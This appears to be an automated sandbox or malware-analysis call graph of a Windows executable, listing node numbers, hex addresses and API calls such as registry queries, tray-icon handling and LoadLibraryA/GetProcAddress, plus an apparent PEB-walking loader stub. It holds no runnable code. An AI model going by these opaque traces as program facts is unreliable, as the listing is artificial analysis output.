633cbb 93684->93688 93686 5c6a63 48 API calls 93685->93686 93687 5c51fb 93686->93687 93687->93688 93689 5c520c 93687->93689 93690 5c510d 48 API calls 93688->93690 93691 5c5216 93689->93691 93692 5c52a7 93689->93692 93695 633cc5 93690->93695 93693 5c510d 48 API calls 93691->93693 93694 5c6eed 48 API calls 93692->93694 93698 5c5220 _memset _wcscpy 93693->93698 93694->93698 93696 5c518c 48 API calls 93695->93696 93695->93698 93697 633ce7 93696->93697 93700 5c518c 48 API calls 93697->93700 93699 5c5288 Shell_NotifyIconW 93698->93699 93699->93681 93700->93698 93701->92627 93703 5cef07 93702->93703 93704 5cef1d 93703->93704 93705 5cef2f 93703->93705 93915 5ce3b0 335 API calls 2 library calls 93704->93915 93916 60cc5c 86 API calls 4 library calls 93705->93916 93708 5cef26 93708->92666 93709 6386f9 93709->93709 93711 5cf130 93710->93711 93713 5cfe30 335 API calls 93711->93713 93717 5cf199 93711->93717 93712 5cf3dd 93716 6387c8 93712->93716 93724 5cf3f2 93712->93724 93762 5cf431 Mailbox 93712->93762 93715 638728 93713->93715 93714 5cf595 93720 5cd7f7 48 API calls 93714->93720 93714->93762 93715->93717 93918 60cc5c 86 API calls 4 library calls 93715->93918 93921 60cc5c 86 API calls 4 library calls 93716->93921 93717->93712 93717->93714 93722 5cd7f7 48 API calls 93717->93722 93753 5cf229 93717->93753 93721 6387a3 93720->93721 93920 5e0f0a 52 API calls __cinit 93721->93920 93726 638772 93722->93726 93751 5cf418 93724->93751 93922 609af1 48 API calls 93724->93922 93725 638b1b 93736 638bcf 93725->93736 93737 638b2c 93725->93737 93919 5e0f0a 52 API calls __cinit 93726->93919 93727 5cd6e9 55 API calls 93727->93762 93729 5cf770 93734 638a45 93729->93734 93752 5cf77a 93729->93752 93731 638b7e 93931 61e40a 335 API calls Mailbox 93731->93931 93732 638c53 93936 60cc5c 86 API calls 4 library calls 93732->93936 93733 638810 93923 61eef8 335 API calls 93733->93923 93928 5dc1af 48 API calls 93734->93928 93735 5cfe30 335 API calls 93754 5cf6aa 93735->93754 93933 60cc5c 86 API calls 4 library calls 93736->93933 93930 61f5ee 335 API calls 93737->93930 93738 638beb 93934 61bdbd 335 API calls Mailbox 93738->93934 93740 5cfe30 335 API calls 93740->93762 93745 5d1b90 48 API calls 93745->93762 93749 5d1b90 48 API calls 93749->93762 93750 638c00 93774 5cf537 Mailbox 93750->93774 93935 60cc5c 86 API calls 4 library calls 93750->93935 93751->93725 93751->93754 93751->93762 93752->93745 93753->93712 93753->93714 93753->93751 93753->93762 93754->93729 93754->93735 93755 5cfce0 93754->93755 93754->93762 93754->93774 93755->93774 93932 60cc5c 86 API calls 4 library calls 93755->93932 93757 638823 93757->93751 93761 63884b 93757->93761 93760 60cc5c 86 API calls 93760->93762 93924 61ccdc 48 API calls 93761->93924 93762->93727 93762->93731 93762->93732 93762->93738 93762->93740 93762->93749 93762->93755 93762->93760 93762->93774 93917 5cdd47 48 API calls ___crtGetEnvironmentStringsW 93762->93917 93929 5f97ed InterlockedDecrement 93762->93929 93937 5dc1af 48 API calls 93762->93937 93764 638857 93766 638865 93764->93766 93767 6388aa 93764->93767 93925 609b72 48 API calls 93766->93925 93770 6388a0 Mailbox 93767->93770 93926 60a69d 48 API calls 93767->93926 93768 5cfe30 335 API calls 93768->93774 93770->93768 93772 6388e7 93927 5cbc74 48 API calls 93772->93927 93774->92666 93776 5d479f 93775->93776 93777 5d4637 93775->93777 93780 5cce19 48 API calls 93776->93780 93778 636e05 93777->93778 93779 5d4643 93777->93779 93992 61e822 93778->93992 93991 5d4300 335 API calls ___crtGetEnvironmentStringsW 93779->93991 93787 5d46e4 Mailbox 93780->93787 93783 636e11 93784 5d4739 Mailbox 93783->93784 94032 60cc5c 86 API calls 4 library calls 93783->94032 93784->92666 93786 5d4659 93786->93783 93786->93784 93786->93787 93791 5c4252 84 API calls 93787->93791 93938 606524 93787->93938 93941 60fa0c 93787->93941 93982 616ff0 93787->93982 93791->93784 93793 63df42 93792->93793 93794 5de253 93792->93794 93795 63df77 93793->93795 93796 63df59 TranslateAcceleratorW 93793->93796 93794->92666 93796->93794 93798 5ddca3 93797->93798 93801 5ddc71 93797->93801 93798->92666 93799 5ddc96 IsDialogMessageW 93799->93798 93799->93801 93800 63dd1d GetClassLongW 93800->93799 93800->93801 93801->93798 93801->93799 93801->93800 93802->92666 94167 5cbd30 93803->94167 93805 5d3267 93807 5d32f8 93805->93807 93808 63907a 93805->93808 93865 5d3628 93805->93865 94179 5dc36b 86 API calls 93807->94179 94185 60cc5c 86 API calls 4 library calls 93808->94185 93812 5dc3c3 48 API calls 93863 5d34eb Mailbox ___crtGetEnvironmentStringsW 93812->93863 93813 5d3313 93813->93863 93813->93865 93869 6394df 93813->93869 94172 5c2b7a 93813->94172 93814 6391fa 94190 60cc5c 86 API calls 4 library calls 93814->94190 93818 63909a 93818->93814 93822 5cd645 53 API calls 93818->93822 93819 6393c5 93821 5cfe30 335 API calls 93819->93821 93820 63926d 94194 60cc5c 86 API calls 4 library calls 93820->94194 93824 639407 93821->93824 93825 63910c 93822->93825 93832 5cd6e9 55 API calls 93824->93832 93824->93865 93827 639220 93825->93827 93828 639114 93825->93828 94191 5c1caa 49 API calls 93827->94191 93840 639128 93828->93840 93849 639152 93828->93849 93830 5d33ce 93835 5d3465 93830->93835 93836 63945e 93830->93836 93830->93863 93837 639438 93832->93837 93842 5df4ea 48 API calls 93835->93842 94200 60c942 50 API calls 93836->94200 94199 60cc5c 86 API calls 4 library calls 93837->94199 93838 63923d 93843 639252 93838->93843 93844 63925e 93838->93844 93839 5cfe30 335 API calls 93839->93863 94186 60cc5c 86 API calls 4 library calls 93840->94186 93852 5d346c 93842->93852 94192 60cc5c 86 API calls 4 library calls 93843->94192 94193 60cc5c 86 API calls 4 library calls 93844->94193 93850 639177 93849->93850 93855 639195 93849->93855 94187 61f320 335 API calls 93850->94187 93859 5d351f 93852->93859 93854 5df4ea 48 API calls 93854->93863 93856 63918b 93855->93856 94188 61f5ee 335 API calls 93855->94188 93856->93865 94189 5dc2d6 48 API calls ___crtGetEnvironmentStringsW 93856->94189 93861 5c6eed 48 API calls 93859->93861 93862 5d3540 93859->93862 93861->93862 93862->93865 93868 6394b0 93862->93868 93873 5d3585 93862->93873 93863->93812 93863->93818 93863->93819 93863->93820 93863->93837 93863->93839 93863->93854 93863->93859 93864 639394 93863->93864 93863->93865 94181 5cd9a0 53 API calls __cinit 93863->94181 94182 5cd8c0 53 API calls 93863->94182 94183 5dc2d6 48 API calls ___crtGetEnvironmentStringsW 93863->94183 94195 61cda2 82 API calls Mailbox 93863->94195 94196 6080e3 53 API calls 93863->94196 94197 5cd764 55 API calls 93863->94197 94198 5cdcae 50 API calls Mailbox 93863->94198 93867 5df4ea 48 API calls 93864->93867 93874 5d3635 Mailbox 93865->93874 94184 60cc5c 86 API calls 4 library calls 93865->94184 93867->93819 94201 5cdcae 50 API calls Mailbox 93868->94201 93869->93865 94202 60cc5c 86 API calls 4 library calls 93869->94202 93871 5d3615 94180 5cdcae 50 API calls Mailbox 93871->94180 93873->93865 93873->93869 93873->93871 93874->92666 93875->92648 93876->92640 93877->92644 93878->92666 93879->92666 93880->92667 93881->92667 93882->92667 93884 5cfe50 93883->93884 93907 5cfe7e 93883->93907 93885 5df4ea 48 API calls 93884->93885 93885->93907 93886 5d146e 93887 5c6eed 48 API calls 93886->93887 93910 5cffe1 93887->93910 93888 5df4ea 48 API calls 93888->93907 93889 5cd7f7 48 API calls 93889->93907 93890 5d0509 94209 60cc5c 86 API calls 4 library calls 93890->94209 93893 5d1473 94208 60cc5c 86 API calls 4 library calls 93893->94208 93895 63a922 93895->92666 93896 63a246 93900 5c6eed 48 API calls 93896->93900 93898 5c6eed 48 API calls 93898->93907 93900->93910 93901 5f97ed InterlockedDecrement 93901->93907 93902 63a873 93902->92666 93903 63a30e 93903->93910 94206 5f97ed InterlockedDecrement 93903->94206 93904 5e0f0a 52 API calls __cinit 93904->93907 93906 63a973 94210 60cc5c 86 API calls 4 library calls 93906->94210 93907->93886 93907->93888 93907->93889 93907->93890 93907->93893 93907->93896 93907->93898 93907->93901 93907->93903 93907->93904 93907->93906 93909 5d15b5 93907->93909 93907->93910 94204 5d1820 335 API calls 2 library calls 93907->94204 94205 5d1d10 59 API calls Mailbox 93907->94205 94207 60cc5c 86 API calls 4 library calls 93909->94207 93910->92666 93911 63a982 93912->92667 93913->92667 93914->92667 93915->93708 93916->93709 93917->93762 93918->93717 93919->93753 93920->93762 93921->93774 93922->93733 93923->93757 93924->93764 93925->93770 93926->93772 93927->93770 93928->93762 93929->93762 93930->93762 93931->93755 93932->93774 93933->93774 93934->93750 93935->93774 93936->93774 93937->93762 94033 606ca9 GetFileAttributesW 93938->94033 93942 60fa1c __ftell_nolock 93941->93942 93943 60fa44 93942->93943 94118 5cd286 48 API calls 93942->94118 94037 5c936c 93943->94037 93946 60fb92 93946->93784 93947 60fa5e 93947->93946 93948 60fa80 93947->93948 93949 60fb68 93947->93949 93950 5c936c 81 API calls 93948->93950 93951 5c41a9 136 API calls 93949->93951 93956 60fa8c _wcscpy _wcschr 93950->93956 93952 60fb79 93951->93952 93953 60fb8e 93952->93953 93954 5c41a9 136 API calls 93952->93954 93953->93946 93955 5c936c 81 API calls 93953->93955 93954->93953 93957 60fbc7 93955->93957 93961 60fab0 _wcscat _wcscpy 93956->93961 93965 60fade _wcscat 93956->93965 93959 5c936c 81 API calls 93960 60fafc _wcscpy 93959->93960 93963 5c936c 81 API calls 93961->93963 93963->93965 93965->93959 93983 5c936c 81 API calls 93982->93983 93984 61702a 93983->93984 93985 5cb470 91 API calls 93984->93985 93986 61703a 93985->93986 93987 5cfe30 335 API calls 93986->93987 93988 61705f 93986->93988 93987->93988 93990 617063 93988->93990 94158 5ccdb9 48 API calls 93988->94158 93990->93784 93991->93786 93993 61e868 93992->93993 93994 61e84e 93992->93994 94160 61ccdc 48 API calls 93993->94160 94159 60cc5c 86 API calls 4 library calls 93994->94159 93997 61e871 93998 5cfe30 334 API calls 93997->93998 93999 61e8cf 93998->93999 94000 61e96a 93999->94000 94002 61e916 93999->94002 94012 61e860 Mailbox 93999->94012 94001 61e978 94000->94001 94004 61e9c7 94000->94004 94162 60a69d 48 API calls 94001->94162 94161 609b72 48 API calls 94002->94161 94007 5c936c 81 API calls 94004->94007 94004->94012 94006 61e949 94009 5d45e0 334 API calls 94006->94009 94010 61e9e1 94007->94010 94008 61e99b 94163 5cbc74 48 API calls 94008->94163 94009->94012 94013 5cbdfa 48 API calls 94010->94013 94012->93783 94015 61ea05 CharUpperBuffW 94013->94015 94014 61e9a3 Mailbox 94017 5d3200 334 API calls 94014->94017 94016 61ea1f 94015->94016 94018 61ea72 94016->94018 94017->94012 94032->93784 94034 606529 94033->94034 94035 606cc4 FindFirstFileW 94033->94035 94034->93784 94035->94034 94036 606cd9 FindClose 94035->94036 94036->94034 94038 5c9384 94037->94038 94055 5c9380 94037->94055 94039 5c9398 94038->94039 94040 634bbf 94038->94040 94042 634cbd __i64tow 94038->94042 94049 5c93b0 __itow Mailbox _wcscpy 94038->94049 94121 5e172b 80 API calls 3 library calls 94039->94121 94043 634ca5 94040->94043 94044 634bc8 94040->94044 94042->94042 94122 5e172b 80 API calls 3 library calls 94043->94122 94048 634be7 94044->94048 94044->94049 94045 5df4ea 48 API calls 94047 5c93ba 94045->94047 94051 5cce19 48 API calls 94047->94051 94047->94055 94050 5df4ea 48 API calls 94048->94050 94049->94045 94052 634c04 94050->94052 94051->94055 94053 5df4ea 48 API calls 94052->94053 94054 634c2a 94053->94054 94054->94055 94055->93947 94118->93943 94121->94049 94122->94049 94158->93990 94159->94012 94160->93997 94161->94006 94162->94008 94163->94014 94168 5cbd3f 94167->94168 94171 5cbd5a 94167->94171 94169 5cbdfa 48 API calls 94168->94169 94170 5cbd47 CharUpperBuffW 94169->94170 94170->94171 94171->93805 94173 5c2b8b 94172->94173 94174 63436a 94172->94174 94175 5df4ea 48 API calls 94173->94175 94176 5c2b92 94175->94176 94177 5c2bb3 94176->94177 94203 5c2bce 48 API calls 94176->94203 94177->93830 94179->93813 94180->93865 94181->93863 94182->93863 94183->93863 94184->93874 94185->93813 94186->93865 94187->93856 94188->93856 94189->93814 94190->93865 94191->93838 94192->93865 94193->93865 94194->93865 94195->93863 94196->93863 94197->93863 94198->93863 94199->93865 94200->93859 94201->93869 94202->93865 94203->94177 94204->93907 94205->93907 94206->93910 94207->93910 94208->93902 94209->93895 94210->93911 94212 5c513f __NMSG_WRITE 94211->94212 94213 631b27 94212->94213 94214 5c5151 94212->94214 94215 5c6b4a 48 API calls 94213->94215 94216 5cbb85 48 API calls 94214->94216 94217 631b34 94215->94217 94218 5c515e ___crtGetEnvironmentStringsW 94216->94218 94219 5dee75 48 API calls 94217->94219 94218->92716 94220 631b57 ___crtGetEnvironmentStringsW 94219->94220 94231 639c06 94242 5dd3be 94231->94242 94233 639c1c 94234 639c91 Mailbox 94233->94234 94251 5c1caa 49 API calls 94233->94251 94237 5d3200 335 API calls 94234->94237 94236 639c71 94239 639cc5 94236->94239 94252 60b171 48 API calls 94236->94252 94237->94239 94240 63a7ab Mailbox 94239->94240 94253 60cc5c 86 API calls 4 library calls 94239->94253 94243 5dd3dc 94242->94243 94244 5dd3ca 94242->94244 94246 5dd40b 94243->94246 94247 5dd3e2 94243->94247 94254 5cdcae 50 API calls Mailbox 94244->94254 94255 5cdcae 50 API calls Mailbox 94246->94255 94249 5df4ea 48 API calls 94247->94249 94250 5dd3d4 94249->94250 94250->94233 94251->94236 94252->94234 94253->94240 94254->94250 94255->94250 94256 63197b 94261 5ddd94 94256->94261 94260 63198a 94262 5df4ea 48 API calls 94261->94262 94263 5ddd9c 94262->94263 94264 5dddb0 94263->94264 94269 5ddf3d 94263->94269 94268 5e0f0a 52 API calls __cinit 94264->94268 94268->94260 94270 5ddda8 94269->94270 94271 5ddf46 94269->94271 94273 5dddc0 94270->94273 94301 5e0f0a 52 API calls __cinit 94271->94301 94274 5cd7f7 48 API calls 94273->94274 94275 5dddd7 GetVersionExW 94274->94275 94276 5c6a63 48 API calls 94275->94276 94277 5dde1a 94276->94277 94302 5ddfb4 94277->94302 94280 5c6571 48 API calls 94283 5dde2e 94280->94283 94282 6324c8 94283->94282 94306 5ddf77 94283->94306 94285 5ddea4 GetCurrentProcess 94315 5ddf5f LoadLibraryA GetProcAddress 94285->94315 94286 5ddebb 94287 5ddf31 GetSystemInfo 94286->94287 94288 5ddee3 94286->94288 94290 5ddf0e 94287->94290 94309 5de00c 94288->94309 94293 5ddf1c FreeLibrary 94290->94293 94294 5ddf21 94290->94294 94293->94294 94294->94264 94295 5ddf29 GetSystemInfo 94297 5ddf03 94295->94297 94296 5ddef9 94312 5ddff4 94296->94312 94297->94290 94300 5ddf09 FreeLibrary 94297->94300 94300->94290 94301->94270 94303 5ddfbd 94302->94303 94304 5cb18b 48 API calls 94303->94304 94305 5dde22 94304->94305 94305->94280 94316 5ddf89 94306->94316 94320 5de01e 94309->94320 94313 5de00c 2 API calls 94312->94313 94314 5ddf01 GetNativeSystemInfo 94313->94314 94314->94297 94315->94286 94317 5ddea0 94316->94317 94318 5ddf92 LoadLibraryA 94316->94318 94317->94285 94317->94286 94318->94317 94319 5ddfa3 GetProcAddress 94318->94319 94319->94317 94321 5ddef1 94320->94321 94322 5de027 LoadLibraryA 94320->94322 94321->94295 94321->94296 94322->94321 94323 5de038 GetProcAddress 94322->94323 94323->94321 94324 6319cb 94329 5c2322 94324->94329 94326 6319d1 94362 5e0f0a 52 API calls __cinit 94326->94362 94328 6319db 94330 5c2344 94329->94330 94363 5c26df 94330->94363 94335 5cd7f7 48 API calls 94336 5c2384 94335->94336 94337 5cd7f7 48 API calls 94336->94337 94338 5c238e 94337->94338 94339 5cd7f7 48 API calls 94338->94339 94340 5c2398 94339->94340 94341 5cd7f7 48 API calls 94340->94341 94342 5c23de 94341->94342 94343 5cd7f7 48 API calls 94342->94343 94344 5c24c1 94343->94344 94371 5c263f 94344->94371 94348 5c24f1 94349 5cd7f7 48 API calls 94348->94349 94350 5c24fb 94349->94350 94400 5c2745 94350->94400 94352 5c2546 94353 5c2556 GetStdHandle 94352->94353 94354 5c25b1 94353->94354 94355 63501d 94353->94355 94356 5c25b7 CoInitialize 94354->94356 94355->94354 94357 635026 94355->94357 94356->94326 94407 6092d4 53 API calls 94357->94407 94359 63502d 94408 6099f9 CreateThread 94359->94408 94361 635039 CloseHandle 94361->94356 94362->94328 94409 5c2854 94363->94409 94366 5c6a63 48 API calls 94367 5c234a 94366->94367 94368 5c272e 94367->94368 94423 5c27ec 6 API calls 94368->94423 94370 5c237a 94370->94335 94372 5cd7f7 48 API calls 94371->94372 94373 5c264f 94372->94373 94374 5cd7f7 48 API calls 94373->94374 94375 5c2657 94374->94375 94424 5c26a7 94375->94424 94378 5c26a7 48 API calls 94379 5c2667 94378->94379 94380 5cd7f7 48 API calls 94379->94380 94381 5c2672 94380->94381 94382 5df4ea 48 API calls 94381->94382 94383 5c24cb 94382->94383 94384 5c22a4 94383->94384 94385 5c22b2 94384->94385 94386 5cd7f7 48 API calls 94385->94386 94387 5c22bd 94386->94387 94388 5cd7f7 48 API calls 94387->94388 94389 5c22c8 94388->94389 94390 5cd7f7 48 API calls 94389->94390 94391 5c22d3 94390->94391 94392 5cd7f7 48 API calls 94391->94392 94393 5c22de 94392->94393 94394 5c26a7 48 API calls 94393->94394 94395 5c22e9 94394->94395 94396 5df4ea 48 API calls 94395->94396 94397 5c22f0 94396->94397 94398 631fe7 94397->94398 94399 5c22f9 RegisterWindowMessageW 94397->94399 94399->94348 94401 5c2755 94400->94401 94402 635f4d 94400->94402 94404 5df4ea 48 API calls 94401->94404 94429 60c942 50 API calls 94402->94429 94406 5c275d 94404->94406 94405 635f58 94406->94352 94407->94359 94408->94361 94430 6099df 54 API calls 94408->94430 94416 5c2870 94409->94416 94412 5c2870 48 API calls 94413 5c2864 94412->94413 94414 5cd7f7 48 API calls 94413->94414 94415 5c2716 94414->94415 94415->94366 94417 5cd7f7 48 API calls 94416->94417 94418 5c287b 94417->94418 94419 5cd7f7 48 API calls 94418->94419 94420 5c2883 94419->94420 94421 5cd7f7 48 API calls 94420->94421 94422 5c285c 94421->94422 94422->94412 94423->94370 94425 5cd7f7 48 API calls 94424->94425 94426 5c26b0 94425->94426 94427 5cd7f7 48 API calls 94426->94427 94428 5c265f 94427->94428 94428->94378 94429->94405 94431 6319ba 94436 5dc75a 94431->94436 94435 6319c9 94437 5cd7f7 48 API calls 94436->94437 94438 5dc7c8 94437->94438 94444 5dd26c 94438->94444 94440 5dc865 94442 5dc881 94440->94442 94447 5dd1fa 48 API calls ___crtGetEnvironmentStringsW 94440->94447 94443 5e0f0a 52 API calls __cinit 94442->94443 94443->94435 94448 5dd298 94444->94448 94447->94440 94449 5dd28b 94448->94449 94450 5dd2a5 94448->94450 94449->94440 94450->94449 94451 5dd2ac RegOpenKeyExW 94450->94451 94451->94449 94452 5dd2c6 RegQueryValueExW 94451->94452 94453 5dd2fc RegCloseKey 94452->94453 94454 5dd2e7 94452->94454 94453->94449 94454->94453 94455 638eb8 94459 60a635 94455->94459 94457 638ec3 94458 60a635 84 API calls 94457->94458 94458->94457 94460 60a66f 94459->94460 94464 60a642 94459->94464 94460->94457 94461 60a671 94471 5dec4e 81 API calls 94461->94471 94462 60a676 94465 5c936c 81 API calls 94462->94465 94464->94460 94464->94461 94464->94462 94468 60a669 94464->94468 94466 60a67d 94465->94466 94467 5c510d 48 API calls 94466->94467 94467->94460 94470 5d4525 61 API calls ___crtGetEnvironmentStringsW 94468->94470 94470->94460 94471->94462 94472 f46398 94486 f43fe8 94472->94486 94474 f46492 94489 f46288 94474->94489 94488 f44673 94486->94488 94492 f474b8 GetPEB 94486->94492 94488->94474 94490 f46291 Sleep 94489->94490 94491 f4629f 94490->94491 94492->94488 94493 5cef80 94496 5d3b70 94493->94496 94495 5cef8c 94497 5d3bc8 94496->94497 94548 5d42a5 94496->94548 94498 5d3bef 94497->94498 94500 636fd1 94497->94500 94503 636f7e 94497->94503 94509 636f9b 94497->94509 94499 5df4ea 48 API calls 94498->94499 94501 5d3c18 94499->94501 94576 61ceca 335 API calls Mailbox 94500->94576 94505 5df4ea 48 API calls 94501->94505 94503->94498 94506 636f87 94503->94506 94504 636fbe 94575 60cc5c 86 API calls 4 library calls 94504->94575 94557 5d3c2c __NMSG_WRITE ___crtGetEnvironmentStringsW 94505->94557 94573 61d552 335 API calls Mailbox 94506->94573 94509->94504 94574 61da0e 335 API calls 2 library calls 94509->94574 94510 5d42f2 94595 60cc5c 86 API calls 4 library calls 94510->94595 94513 6373b0 94513->94495 94514 63737a 94594 60cc5c 86 API calls 4 library calls 94514->94594 94515 637297 94584 60cc5c 86 API calls 4 library calls 94515->94584 94519 5d40df 94585 60cc5c 86 API calls 4 library calls 94519->94585 94521 63707e 94577 60cc5c 86 API calls 4 library calls 94521->94577 94523 5cd6e9 55 API calls 94523->94557 94525 5ddce0 53 API calls 94525->94557 94527 5cd645 53 API calls 94527->94557 94530 6372d2 94586 60cc5c 86 API calls 4 library calls 94530->94586 94531 637350 94592 60cc5c 86 API calls 4 library calls 94531->94592 94533 5cfe30 335 API calls 94533->94557 94536 6372e9 94587 60cc5c 86 API calls 4 library calls 94536->94587 94537 637363 94593 60cc5c 86 API calls 4 library calls 94537->94593 94540 5c6a63 48 API calls 94540->94557 94542 5df4ea 48 API calls 94542->94557 94543 5dc050 48 API calls 94543->94557 94544 63714c 94581 61ccdc 48 API calls 94544->94581 94546 5d3f2b 94546->94495 94547 63733f 94591 60cc5c 86 API calls 4 library calls 94547->94591 94588 60cc5c 86 API calls 4 library calls 94548->94588 94550 5cd286 48 API calls 94550->94557 94552 6371a1 94583 5dc15c 48 API calls 94552->94583 94554 5dee75 48 API calls 94554->94557 94555 5c6eed 48 API calls 94555->94557 94557->94510 94557->94514 94557->94515 94557->94519 94557->94521 94557->94523 94557->94525 94557->94527 94557->94530 94557->94531 94557->94533 94557->94536 94557->94537 94557->94540 94557->94542 94557->94543 94557->94544 94557->94546 94557->94547 94557->94548 94557->94550 94557->94554 94557->94555 94560 6371e1 94557->94560 94568 5cd9a0 53 API calls __cinit 94557->94568 94569 5cd83d 53 API calls 94557->94569 94570 5ccdb9 48 API calls 94557->94570 94571 5dc15c 48 API calls 94557->94571 94572 5dbecb 335 API calls 94557->94572 94578 5cdcae 50 API calls Mailbox 94557->94578 94579 61ccdc 48 API calls 94557->94579 94580 60a1eb 50 API calls 94557->94580 94559 6371ce 94563 5dc050 48 API calls 94559->94563 94560->94546 94590 60cc5c 86 API calls 4 library calls 94560->94590 94562 63715f 94562->94552 94582 61ccdc 48 API calls 94562->94582 94565 6371d6 94563->94565 94564 6371ab 94564->94548 94564->94559 94565->94560 94566 637313 94565->94566 94589 60cc5c 86 API calls 4 library calls 94566->94589 94568->94557 94569->94557 94570->94557 94571->94557 94572->94557 94573->94546 94574->94504 94575->94500 94576->94557 94577->94546 94578->94557 94579->94557 94580->94557 94581->94562 94582->94562 94583->94564 94584->94519 94585->94546 94586->94536 94587->94546 94588->94546 94589->94546 94590->94546 94591->94546 94592->94546 94593->94546 94594->94546 94595->94513 94596 5cb7b1 94605 5cc62c 94596->94605 94598 5cb7ec 94615 5cba85 48 API calls ___crtGetEnvironmentStringsW 94598->94615 94599 5cb7c2 94599->94598 94613 5cbc74 48 API calls 94599->94613 94602 5cb7e0 94614 5cba85 48 API calls ___crtGetEnvironmentStringsW 94602->94614 94604 5cb6b7 Mailbox 94616 5cbcce 94605->94616 94607 6339fd 94622 6026bc 88 API calls 4 library calls 94607->94622 94609 5cc799 48 API calls 94611 5cc63b 94609->94611 94610 5cc68b 94610->94599 94611->94607 94611->94609 94611->94610 94612 633a0b 94613->94602 94614->94598 94615->94604 94617 5cbce8 94616->94617 94618 5cbcdb 94616->94618 94619 5df4ea 48 API calls 94617->94619 94618->94611 94620 5cbcf2 94619->94620 94621 5dee75 48 API calls 94620->94621 94621->94618 94622->94612 94623 5c3742 94624 5c374b 94623->94624 94625 5c37c8 94624->94625 94626 5c3769 94624->94626 94663 5c37c6 94624->94663 94630 5c37ce 94625->94630 94631 631e00 94625->94631 94627 5c382c PostQuitMessage 94626->94627 94628 5c3776 94626->94628 94655 5c37b9 94627->94655 94633 631e88 94628->94633 94634 5c3781 94628->94634 94629 5c37ab DefWindowProcW 94629->94655 94635 5c37f6 SetTimer RegisterWindowMessageW 94630->94635 94636 5c37d3 94630->94636 94678 5c2ff6 16 API calls 94631->94678 94683 604ddd 60 API calls _memset 94633->94683 94638 5c3789 94634->94638 94639 5c3836 94634->94639 94640 5c381f CreatePopupMenu 94635->94640 94635->94655 94642 631da3 94636->94642 94643 5c37da KillTimer 94636->94643 94637 631e27 94679 5de312 335 API calls Mailbox 94637->94679 94646 5c3794 94638->94646 94647 631e6d 94638->94647 94668 5deb83 94639->94668 94640->94655 94650 631da8 94642->94650 94651 631ddc MoveWindow 94642->94651 94675 5c3847 Shell_NotifyIconW _memset 94643->94675 94653 5c379f 94646->94653 94654 631e58 94646->94654 94647->94629 94682 5fa5f3 48 API calls 94647->94682 94648 631e9a 94648->94629 94648->94655 94656 631dcb SetFocus 94650->94656 94657 631dac 94650->94657 94651->94655 94652 5c37ed 94676 5c390f DeleteObject DestroyWindow Mailbox 94652->94676 94653->94629 94680 5c3847 Shell_NotifyIconW _memset 94653->94680 94681 6055bd 70 API calls _memset 94654->94681 94656->94655 94657->94653 94660 631db5 94657->94660 94677 5c2ff6 16 API calls 94660->94677 94662 631e68 94662->94655 94663->94629 94666 631e4c 94667 5c4ffc 67 API calls 94666->94667 94667->94663 94669 5dec1c 94668->94669 94670 5deb9a _memset 94668->94670 94669->94655 94671 5c51af 50 API calls 94670->94671 94674 5debc1 94671->94674 94672 5dec05 KillTimer SetTimer 94672->94669 94673 633c7a Shell_NotifyIconW 94673->94672 94674->94672 94674->94673 94675->94652 94676->94655 94677->94655 94678->94637 94679->94653 94680->94666 94681->94662 94682->94663 94683->94648 94684 6319dd 94689 5c4a30 94684->94689 94686 6319f1 94709 5e0f0a 52 API calls __cinit 94686->94709 94688 6319fb 94690 5c4a40 __ftell_nolock 94689->94690 94691 5cd7f7 48 API calls 94690->94691 94692 5c4af6 94691->94692 94693 5c5374 50 API calls 94692->94693 94694 5c4aff 94693->94694 94710 5c363c 94694->94710 94697 5c518c 48 API calls 94698 5c4b18 94697->94698 94699 5c64cf 48 API calls 94698->94699 94700 5c4b29 94699->94700 94701 5cd7f7 48 API calls 94700->94701 94702 5c4b32 94701->94702 94716 5c49fb 94702->94716 94704 5c4b43 Mailbox 94704->94686 94705 5c61a6 48 API calls 94708 5c4b3d _wcscat Mailbox __NMSG_WRITE 94705->94708 94706 5cce19 48 API calls 94706->94708 94707 5c64cf 48 API calls 94707->94708 94708->94704 94708->94705 94708->94706 94708->94707 94709->94688 94711 5c3649 __ftell_nolock 94710->94711 94730 5c366c GetFullPathNameW 94711->94730 94713 5c365a 94714 5c6a63 48 API calls 94713->94714 94715 5c3669 94714->94715 94715->94697 94717 5cbcce 48 API calls 94716->94717 94718 5c4a0a RegOpenKeyExW 94717->94718 94719 5c4a2b 94718->94719 94720 6341cc RegQueryValueExW 94718->94720 94719->94708 94721 634246 RegCloseKey 94720->94721 94722 6341e5 94720->94722 94723 5df4ea 48 API calls 94722->94723 94724 6341fe 94723->94724 94725 5c47b7 48 API calls 94724->94725 94726 634208 RegQueryValueExW 94725->94726 94727 634224 94726->94727 94728 63423b 94726->94728 94729 5c6a63 48 API calls 94727->94729 94728->94721 94729->94728 94731 5c368a 94730->94731 94731->94713 94732 639bec 94757 5d0ae0 Mailbox ___crtGetEnvironmentStringsW 94732->94757 94734 5df4ea 48 API calls 94734->94757 94735 5d1526 Mailbox 94824 60cc5c 86 API calls 4 library calls 94735->94824 94738 5d15b5 94825 60cc5c 86 API calls 4 library calls 94738->94825 94740 5d0509 94827 60cc5c 86 API calls 4 library calls 94740->94827 94741 5d146e 94746 5c6eed 48 API calls 94741->94746 94743 5df4ea 48 API calls 94762 5cfec8 94743->94762 94745 5d1473 94826 60cc5c 86 API calls 4 library calls 94745->94826 94765 5cffe1 Mailbox 94746->94765 94747 63a922 94749 63a246 94753 5c6eed 48 API calls 94749->94753 94752 5c6eed 48 API calls 94752->94762 94753->94765 94754 5cd7f7 48 API calls 94754->94762 94755 63a873 94756 63a30e 94756->94765 94822 5f97ed InterlockedDecrement 94756->94822 94757->94734 94757->94735 94758 5cce19 48 API calls 94757->94758 94757->94762 94757->94765 94767 61e822 335 API calls 94757->94767 94768 5cfe30 335 API calls 94757->94768 94769 63a706 94757->94769 94771 5f97ed InterlockedDecrement 94757->94771 94772 616ff0 335 API calls 94757->94772 94775 620d09 94757->94775 94778 620d1d 94757->94778 94781 61f0ac 94757->94781 94813 60a6ef 94757->94813 94821 61ef61 82 API calls 2 library calls 94757->94821 94758->94757 94760 5f97ed InterlockedDecrement 94760->94762 94761 63a973 94828 60cc5c 86 API calls 4 library calls 94761->94828 94762->94738 94762->94740 94762->94741 94762->94743 94762->94745 94762->94749 94762->94752 94762->94754 94762->94756 94762->94760 94762->94761 94763 5e0f0a 52 API calls __cinit 94762->94763 94762->94765 94819 5d1820 335 API calls 2 library calls 94762->94819 94820 5d1d10 59 API calls Mailbox 94762->94820 94763->94762 94766 63a982 94767->94757 94768->94757 94823 60cc5c 86 API calls 4 library calls 94769->94823 94771->94757 94772->94757 94829 61f8ae 94775->94829 94777 620d19 94777->94757 94779 61f8ae 129 API calls 94778->94779 94780 620d2d 94779->94780 